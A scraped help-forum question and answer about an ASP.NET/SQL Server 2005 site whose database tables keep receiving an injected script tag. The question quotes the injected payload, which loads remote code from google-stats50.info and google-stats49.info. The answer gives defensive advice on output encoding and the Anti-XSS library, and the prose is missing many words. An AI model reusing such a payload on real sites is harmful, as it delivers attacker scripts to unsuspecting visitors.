sql server - XSS Attack on the ASP.NET Website -


i in big trouble. please help!!!!!!!!!!

my website has been attacked malicious script < / title> < script src = http : // google-stats50.info/ur.php >. script appended column(s) of table automatically. have removed script. after few hours, re-appeared in tables. time < / title> < script src = http : // google-stats49.info/ur.php >.

my client complaining script. technology used asp.net 1.1, sql server 2005.

please help.

thanks in advance!!!!!!

when render text database can use 2 ways avoid script.

  1. user server.htmlencode(datafromdatabase);
  2. use microsoft anti-cross dll library have similar function more options.

last ms anti-xss library now 3.1.
how using video

how pass script.

  1. on contact or other forms.
  2. on browser reference on statistics , when browse site, keep log , when go see log script running.

hope help.


Comments

Popular posts from this blog

c++ - Convert big endian to little endian when reading from a binary file -

C#: Application without a window or taskbar item (background app) that can still use Console.WriteLine() -

unicode - Are email addresses allowed to contain non-alphanumeric characters? -